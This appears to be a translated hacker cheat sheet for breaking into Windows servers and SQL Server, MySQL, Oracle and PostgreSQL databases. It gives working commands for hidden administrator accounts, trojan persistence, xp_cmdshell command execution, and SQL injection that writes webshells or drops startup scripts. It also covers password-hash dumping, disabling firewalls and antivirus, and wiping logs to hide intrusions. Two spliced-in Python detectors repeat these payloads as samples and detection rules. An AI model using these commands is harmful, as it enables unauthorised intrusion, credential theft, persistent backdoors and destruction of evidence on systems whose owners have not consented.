1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you get straight in; once inside, run net user administrator /passwordreq:yes to restore the setting.
2. A rather clever sequence for creating a clone account:
First create a user account,
then export the registry, then delete the account in Computer Management,
then re-import the export and add the account to the administrators group.
3. Look up the Radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a key named "services.exe" under it,
then under that key create a string value
whose data is the full path to the trojan.
5. runas /user:guest cmd
Test the user's privileges!
6. tlntadmn config sec = -ntlm, i.e. exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'-- . This simply uses the tlntadmn command; for details, type /? and have a look. (This needs administrator privileges.) Creating an identical user to pass NTLM authentication needs no explanation from me, right?
7. Post-intrusion patching, trace cleaning and backdoor placement:
The basic vulnerabilities must be patched, e.g. SU privilege escalation, SA injection and so on. For DBO injection consider killing xp_treelist and xp_regread, and remember the web directory yourself; you absolutely must remember to clean up your traces~ For SQL Server connections it is better to use Enterprise Manager; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete them. When clearing IIS logs do not use AIO-type tools that wipe the logs completely~ choose a logcleaner-type tool that only deletes the access records for a given IP; if you can get the administrator password through the gina, log in as him to clean the logs and do the final trace cleaning with WYWZ. That said, cleaning by hand is safer. Finally leave behind a backdoor that writes no log entries. Several one-liner backdoors, a standard backdoor and a cfm backdoor are what I never go without. Remember to fix up the timestamps~ And one rather ruthless trick: if the box is just an ordinary zombie, drop a TXT on the administrator's desktop~ telling him you got in, planted a certain backdoor and added a certain user~ (not your real important backdoor, of course~) and ask him to clean it up. That way there is a good chance your real backdoor survives.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
9. MSSQL Server 2005 gates xp_cmdshell by default;
to enable it you must switch it on through advanced options mode.
You can do this directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
After the extended stored procedure has been deleted there is a very simple way to restore it:
Deletion:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restoration:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores them directly, regardless of whether sp_addextendedproc still exists.
-----------------------------
Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is there.

Restore xp_cmdshell:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked.

Otherwise upload xplog70.dll:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL statement to block cmdshell:
sp_dropextendedproc "xp_cmdshell"
-------------------------
Clear the 3389 login records with a single built-in command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
View the current user's privileges in MySQL:
show grants for

The following statements give a user the same privileges as ROOT. Everyone has probably run into this when taking a site: MySQL's root user can only connect locally and refuses external connections. The method below solves that: the statements create a user itpro with password 123 and privileges equal to root, allowed to connect from any host, so you can conveniently work on the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you are done, remember to remove your footprints:

Drop USER 'itpro'@'%';

Drop DATABASE IF EXISTS `itpro` ;
Get SYSTEM privileges from the current user:
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec",user)
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Bypassing the CAPTCHA restriction to get into the back end and grab a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save as code.reg, import it into the registry, restart IE,
and that's it.
Writing a shell with UNION
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Applied to the dedecms injection vulnerability: writes a shell without touching the back end.
In the dedecms back end, when there is no file manager and no outfile privilege,
go to Plugin Management - Virus Scan
and write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format above.
In Oracle, after logging in as a low-privileged user you can run the following statement to query the password hashes of sys and other users, then crack them with Cain:
Code:
select username,password from dba_users;

MySQL remote-connection user
Code:
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
1. Query the terminal port

xp&2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
2. Enable XP & 2003 terminal services

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. Change the terminal port to 20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. Remove the XP & 2003 system firewall's restriction on terminal-service port 3389 and its IP connection restriction

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5. Enable the Win2000 terminal on port 3389 (requires a reboot)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
6. Force-reboot Win2000 & Win2003 (the system reboots automatically once the last line has run)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. Disable TCP/IP port filtering (requires a reboot)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. When the terminal has reached its maximum number of connections, the following command can still connect

mstsc /v:ip:3389 /console

9. Adjust NTFS partition permissions

cacls c: /e /t /g everyone:F (everyone gets full control of the C: drive)

cacls %systemroot%\system32\*.exe /d everyone (deny everyone access to the exe files in system32)
------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Delete the awgina.dll registry value
Code:
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
Set it to 1 to disable LM hash storage.
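The registry edits collected above (the Image File Execution Options key, GinaDLL, NoLMHash, fDenyTSConnections, the RDP PortNumber, the GloballyOpenPorts firewall entry, EnableSecurityFilters, and the SpecialAccounts\UserList hiding used further down in the command-line 3389 section) can all be audited from a .reg export of the kind the page builds with echo. The following is an added example, not code from the original post: a parser for REGEDIT4 / "Windows Registry Editor Version 5.00" exports plus one check per indicator. The sample export is constructed, and the IFEO value name Debugger is the standard one rather than a name the page gives.

```python
import re

# Constructed .reg export (not taken from any real host). It reproduces the
# changes this page describes, plus a benign key that must not be flagged.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe]
"Debugger"="c:\\windows\\temp\\svc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL"="awgina.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"asp.net"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters]
"EnableSecurityFilters"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Example\Benign]
@="default"
"Version"="1.0"
"Flags"=dword:00000001
"Blob"=hex:00,01,02
"""

KEY_RE = re.compile(r"^\[(-?)(.+)\]$")
VAL_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')
RDP_DEFAULT_PORT = 0x0D3D   # 3389


def unescape(s: str) -> str:
    return s.replace('\\"', '"').replace("\\\\", "\\")


def decode_data(data: str):
    """Turn the right-hand side of a .reg value line into a Python value."""
    data = data.strip()
    if data.startswith('"') and data.endswith('"'):
        return unescape(data[1:-1])
    if data.lower().startswith("dword:"):
        return int(data[6:], 16)
    if data == "-":
        return None                      # value deletion marker
    return data                          # hex:, hex(2): ... kept raw


def parse_reg(text: str) -> dict:
    """Parse a REGEDIT4 / 'Windows Registry Editor Version 5.00' export into
    {key: {value name: data}}; the default value (@) is stored under ''."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith(("REGEDIT4", "Windows Registry Editor")):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(2)          # a leading '-' (key deletion) is ignored here
            keys.setdefault(current, {})
            continue
        m = VAL_RE.match(line)
        if m and current is not None:
            name = "" if m.group(2) else unescape(m.group(1))
            keys[current][name] = decode_data(m.group(3))
    return keys


def audit(keys: dict) -> list:
    """Return (check, key, value name, data) for each indicator this page's registry edits leave behind."""
    findings = []
    for key, values in keys.items():
        k = key.lower()
        for name, data in values.items():
            n = name.lower()
            if "\\image file execution options\\" in k and n == "debugger":
                findings.append(("ifeo_debugger", key, name, data))        # hijacks the named executable
            elif k.endswith("\\winlogon") and n == "ginadll":
                findings.append(("gina_dll", key, name, data))             # third-party GINA sees every logon
            elif k.endswith("\\specialaccounts\\userlist") and data == 0:
                findings.append(("hidden_account", key, name, data))       # account hidden from the logon screen
            elif k.endswith("\\control\\lsa") and n == "nolmhash" and data == 0:
                findings.append(("lm_hash_stored", key, name, data))
            elif k.endswith("\\terminal server") and n == "fdenytsconnections" and data == 0:
                findings.append(("rdp_enabled", key, name, data))
            elif "\\terminal server\\" in k and n == "portnumber" and data != RDP_DEFAULT_PORT:
                findings.append(("rdp_port_changed", key, name, data))
            elif k.endswith("\\globallyopenports\\list") and isinstance(data, str) and "enabled" in data.lower():
                findings.append(("firewall_port_opened", key, name, data))
            elif k.endswith("\\tcpip\\parameters") and n == "enablesecurityfilters" and data == 0:
                findings.append(("tcpip_filtering_disabled", key, name, data))
    return findings


if __name__ == "__main__":
    for check, key, name, data in audit(parse_reg(SAMPLE_REG)):
        print(f"{check:26s} {key}\\{name} = {data!r}")
```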
Database security: common commands used when breaking into Oracle databases
Recently I ran into a server running an Oracle database. After cramming Oracle and pestering the experts I finally got hold of every user password for the site's back-end admin interface. I found Oracle a real pain to work with, so to spare my brothers some detours I have collected the commands you need during an intrusion.
1. su - oracle  Not required; useful when you do not have the DBA password, since it lets you enter the sqlplus interface without one.
2. sqlplus /nolog, or sqlplus system/manager, or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba; (or as sysoper), or
connect internal/oracle AS SYSDBA; (scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup;  starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$database;  view the columns of the database view
7. How to see which users hold the SYSDBA or SYSOPER privilege:
SQL>select * from V_$PWFILE_USERS;
Show user;  shows the user of the current database connection
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show every column of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in table CQI.T_BBS_XUSER:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant privileges to the user:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change a database user's password: (set the sys and system passwords to test)
alter user sys identified by test;
alter user system identified by test;
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml  database connection configuration
\WEB-INF\server.xml  roughly http.conf + mysql.ini + php.ini rolled into one
\WEB-INF\struts-config.xml  file directory structure

spring.properties contains the name of the hibernate.cfg.xml in use

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of these can be found, look at the class files.
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1

View shared files inside a virtual machine:
run this in the VM's cmd:
\\.host\Shared Folders
Tip for finding the terminal (RDP) port from a cmdshell
Finding the terminal:
Step 1: Tasklist /SVC lists all processes and system services with their PIDs!
The service that corresponds to the terminal is TermService.
Step 2: netstat -ano lists the PID that owns every port!
Find the port that belongs to that PID.

Query the password hash in SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
Export a shell from Access
Complete code for adding a user through MySQL on a Chinese-language operating system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe'
drop table a;
Notes on dealing with that nasty Norton
Look up the path of the Norton service:
sc qc ccSetMgr
Then set permissions that deny access. Go all the way..
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server:
iisreset /reboot
That takes care of it.. but when you are done, remember to restore the permissions....
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
Some notes on PostgreSQL injection
How to get a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs a custom function backed by libc, the other relies on pl/python.
Of course, the PostgreSQL version must be above 8.x for these.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Execute the shell command, sending its output towards the output table:
SELECT system('uname -a > /tmp/test')

Copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the result back from the output table to see whether execution succeeded:
SELECT system_out FROM stdout

Below is a test example:

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
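The xp_cmdshell enabling and restoration statements (items 9 and 10), the sp_oacreate/sp_oamethod shell (item 8), the concatenated EXEC('ma'+'ster..x'+...) form, the MySQL INTO OUTFILE / INTO DUMPFILE writes into the Startup folder, and the PostgreSQL libc system() function and COPY-to-file tricks above all leave recognisable statements in a database query log. The following is an added example, not code from the original post: it normalises each logged statement (URL decoding, joining T-SQL string fragments, stripping trailing comments) before matching, so the obfuscated and injected forms are caught together with the plain ones. The log lines are constructed, and the detector assumes one statement per line.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of logged SQL statements (not a real log). The attack
# lines reproduce the database-to-OS pivots described on this page; the
# others are ordinary application traffic that must not be flagged.
SAMPLE_LOG = [
    "SELECT name FROM sys.tables WHERE type = 'U'",
    "id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--",
    "EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')",
    'dbcc addextendedproc("xp_cmdshell","xplog70.dll")',
    r"declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami'",
    r'select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";',
    "GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION",
    "http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;",
    "CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT",
    "COPY myfile FROM '/etc/passwd'",
    "select name,password from master.dbo.sysxlogins",
    "UPDATE members SET last_login = NOW() WHERE id = 42",
]

# One rule per primitive the page describes; patterns run on the normalised statement.
RULES = [
    ("mssql.xp_cmdshell.enable", re.compile(r"sp_configure\s*'xp_cmdshell'\s*,\s*1")),
    ("mssql.xp_cmdshell.call",   re.compile(r"xp_cmdshell\s+'")),
    ("mssql.xproc.restore",      re.compile(r"dbcc\s+addextendedproc|sp_addextendedproc")),
    ("mssql.ole_automation",     re.compile(r"\bsp_oa(create|method)\b")),
    ("mssql.fs_enum",            re.compile(r"\bxp_(dirtree|regread)\b")),
    ("mysql.grant_all_anyhost",  re.compile(r"grant\s+all\s+privileges\s+on\s+\*\.\*\s+to\s+'[^']*'@'%'")),
    ("postgres.native_function", re.compile(r"create\s+function\b.*?\blanguage\s+'?(c|plpython\w*)\b")),
    ("postgres.copy_read_file",  re.compile(r"\bcopy\b[^;]*?\bfrom\s+(?:'|\$\$)/")),
    ("credential_dump",          re.compile(r"\b(sysxlogins|sql_logins|dba_users)\b")),
]
# INTO OUTFILE / INTO DUMPFILE (MySQL) and COPY ... TO 'file' (PostgreSQL); group 1 is the target path.
FILE_WRITE = re.compile(r"(?:into\s+(?:outfile|dumpfile)|\bcopy\b[^;]*?\bto)\s+(?:'|\"|\$\$)([^'\"$]+)")
RISKY_EXT = re.compile(r"\.(php|asp|aspx|jsp|vbs|exe|dll|bat)$")


def normalize(stmt: str) -> str:
    """Reduce a logged statement to the text the server actually executes."""
    s = stmt
    if re.search(r"%[0-9a-fA-F]{2}", s):   # URL-encoded request line: decode, '+' is a space
        s = unquote_plus(s)
    s = re.sub(r"'\s*\+\s*'", "", s)       # join T-SQL fragments: 'ma'+'ster..x' -> 'master..x'
    s = re.sub(r"--.*$", "", s)            # drop the trailing comment injections end with
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).strip().lower()


def scan_line(line: str):
    """Return (matched rule names, path written if the statement writes a file)."""
    s = normalize(line)
    hits = [name for name, rx in RULES if rx.search(s)]
    target = None
    m = FILE_WRITE.search(s)
    if m:
        target = m.group(1).strip()
        hits.append("file_write")
        if RISKY_EXT.search(target):        # script or binary dropped on disk
            hits.append("file_write.script_or_binary")
    return hits, target


def scan_log(lines):
    """Findings for every line that trips at least one rule."""
    findings = []
    for no, line in enumerate(lines, 1):
        hits, target = scan_line(line)
        if hits:
            findings.append({"line": no, "rules": hits, "target": target})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        extra = f" -> {f['target']}" if f["target"] else ""
        print(f"line {f['line']:2d}: {', '.join(f['rules'])}{extra}")
```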
net stop sharedaccess   stops the default firewall
netsh firewall show   shows the default firewall configuration
netsh firewall set notifications disable   disables the notification shown when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost   adds a program to the default firewall's allowed list
Method for changing the 3389 port (harder to find by scanning once changed)
Change the port setting on the server side; there are two places in the registry to modify:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
The PortNumber value, 3389 by default; change it to the port you want, e.g. 6000.
The second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
The PortNumber value, 3389 by default; change it to the port you want, e.g. 6000.
That is all; reboot the system and it is done.
Script to watch 3389 remote logins
Save it as a bat file:
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
mstsc parameters:

Remote Desktop Connection
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.
/v:<server[:port]> -- specifies the terminal server to connect to.
/console -- connects to the console session of the server.
/f -- starts the client in full-screen mode.
/w:<width> -- specifies the width of the remote desktop screen.
/h:<height> -- specifies the height of the remote desktop screen.
/edit -- opens the specified .rdp file for editing.
/migrate -- migrates legacy connection files created by Client Connection Manager to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which amounts to a separate logon to the computer. In other words, connecting with the console parameter gets you the desktop shown on the physical display. Give it a try; it comes in handy sometimes, especially with some software that
mstsc /console /v:124.42.126.xxx   bypasses the limit on the number of terminal connections
Enable 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
